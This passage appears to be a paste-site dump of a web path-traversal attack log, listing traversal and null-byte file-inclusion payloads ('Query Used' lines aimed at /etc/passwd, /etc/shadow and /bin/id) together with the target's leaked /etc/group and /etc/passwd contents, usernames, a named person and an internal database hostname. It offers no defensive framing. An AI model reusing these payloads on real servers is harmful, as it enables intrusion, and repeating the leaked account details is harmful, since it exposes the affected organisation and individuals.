  3694. stapdev:x:497:
  3695. stapusr:x:496:
  3696. sysadmin:x:401:cmccan,darnold,kmars,mstrydom,nscanner
  3697. cmccan:x:500:
  3698. darnold:x:501:
  3699. kmars:x:503:
  3700. zabbix:x:309:
  3701. clamav:x:311:
  3702. clamupdate:x:312:
  3703. clam:x:308:
  3704. cgred:x:504:
  3705. mstrydom:x:533:
  3706. forecast:x:302:
  3707. ahps:x:303:
  3708. nwschat:x:320:
  3709. nscanner:x:424:
  3710. memcached:x:301:
  3711. stapsys:x:157:
  3712. <b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.php.inc</b>root:x:0:0:root:/root:/bin/bash
  3713. bin:x:1:1:bin:/bin:/sbin/nologin
  3714. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3715. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3716. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3717. sync:x:5:0:sync:/sbin:/bin/sync
  3718. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3719. halt:x:7:0:halt:/sbin:/sbin/halt
  3720. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3721. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3722. operator:x:11:0:operator:/root:/sbin/nologin
  3723. games:x:12:100:games:/usr/games:/sbin/nologin
  3724. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3725. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3726. nobody:x:99:99:Nobody:/:/sbin/nologin
  3727. dbus:x:81:81:System message bus:/:/sbin/nologin
  3728. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  3729. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  3730. abrt:x:499:499::/etc/abrt:/sbin/nologin
  3731. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  3732. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  3733. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  3734. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  3735. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3736. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  3737. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  3738. apache:x:48:48:Apache:/var/www:/sbin/nologin
  3739. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  3740. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3741. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  3742. tcpdump:x:72:72::/:/sbin/nologin
  3743. cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
  3744. darnold:x:501:501:darnold:/home/darnold:/bin/bash
  3745. kmars:x:503:503:kmars:/home/kmars:/bin/bash
  3746. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  3747. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  3748. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  3749. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  3750. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  3751. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  3752. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  3753. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
  3754. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  3755. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  3756. <b>Query Used: /&apos;%00.php.inc</b>.<b>Query Used: /\,%ENV\,/%00.php.inc</b>.<b>Query Used: /etc/passwd%00.php.inc</b>.<b>Query Used: /etc/passwd%00.php.inc</b>.<b>Query Used: /.....%0a%00.php.inc</b>.<b>Query Used: ..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2fetc%2f%2fpasswd%00.php.inc</b>root:x:0:0:root:/root:/bin/bash
  3757. bin:x:1:1:bin:/bin:/sbin/nologin
  3758. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3759. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3760. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3761. sync:x:5:0:sync:/sbin:/bin/sync
  3762. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3763. halt:x:7:0:halt:/sbin:/sbin/halt
  3764. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3765. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3766. operator:x:11:0:operator:/root:/sbin/nologin
  3767. games:x:12:100:games:/usr/games:/sbin/nologin
  3768. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3769. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3770. nobody:x:99:99:Nobody:/:/sbin/nologin
  3771. dbus:x:81:81:System message bus:/:/sbin/nologin
  3772. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  3773. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  3774. abrt:x:499:499::/etc/abrt:/sbin/nologin
  3775. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  3776. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  3777. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  3778. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  3779. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3780. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  3781. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  3782. apache:x:48:48:Apache:/var/www:/sbin/nologin
  3783. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  3784. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3785. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  3786. tcpdump:x:72:72::/:/sbin/nologin
  3787. cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
  3788. darnold:x:501:501:darnold:/home/darnold:/bin/bash
  3789. kmars:x:503:503:kmars:/home/kmars:/bin/bash
  3790. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  3791. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  3792. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  3793. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  3794. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  3795. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  3796. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  3797. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
  3798. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  3799. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  3800. <b>Query Used: /etc/passwd^^%00.php.inc</b>Array
  3801. (
  3802. [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
  3803. Too many connections
  3804. )
  3805. <b>Query Used: /etc/group%00.php.inc</b>Array
  3806. (
  3807. [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
  3808. Too many connections
  3809. )
  3810. <b>Query Used: \\\\\\\etc/\passwd%00.php.inc</b>.<b>Query Used: /etc/shadow^^%00.php.inc</b>.<b>Query Used: /bin/id|%00.php.inc</b>Array
  3811. (
  3812. [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
  3813. Too many connections
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement